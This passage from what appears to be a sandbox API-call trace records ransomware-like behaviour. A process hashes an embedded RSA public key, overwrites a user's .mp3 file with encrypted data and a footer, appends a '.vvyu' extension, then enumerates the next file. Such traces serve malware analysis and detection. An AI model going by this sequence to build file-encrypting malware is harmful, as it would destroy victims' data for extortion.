lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.173] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.173] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x93c4, lpOverlapped=0x0) returned 1 [0201.174] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.175] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.175] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.175] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.176] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.176] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.176] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.176] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.176] GetLastError () returned 0x0 [0201.176] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.176] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.177] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.177] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.177] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x93c0) returned 0x2ea99b0 [0201.177] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fc48 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fc90 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0201.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0201.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.179] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3428 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3410 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0201.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.182] GetCurrentThreadId () returned 0x66c [0201.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8598 [0201.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.183] GetCurrentThreadId () returned 0x66c [0201.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0201.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3428 [0201.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0201.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3488 [0201.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0201.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34a0 [0201.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3440 [0201.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3410 [0201.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0201.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0201.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0201.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0201.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0201.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fc90 | out: hHeap=0x620000) returned 1 [0201.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.194] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x93bf, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x93bf, lpOverlapped=0x0) returned 1 [0201.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.196] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x93c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.196] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.198] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.198] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.198] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.198] CloseHandle (hObject=0x510) returned 1 [0201.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0201.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0201.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.201] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\02RH90y7ReBgxW.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\02rh90y7rebgxw.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\02RH90y7ReBgxW.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\02rh90y7rebgxw.mp3.vvyu")) returned 1 [0201.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.203] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0201.206] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe91710, ftCreationTime.dwHighDateTime=0x1d89d94, ftLastAccessTime.dwLowDateTime=0xa6b36b80, ftLastAccessTime.dwHighDateTime=0x1d8a6d9, ftLastWriteTime.dwLowDateTime=0xa6b36b80, ftLastWriteTime.dwHighDateTime=0x1d8a6d9, nFileSizeHigh=0x0, nFileSizeLow=0x1716b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hyXqTEnB.mp3", cAlternateFileName="")) returned 1 [0201.206] RtlAllocateHeap 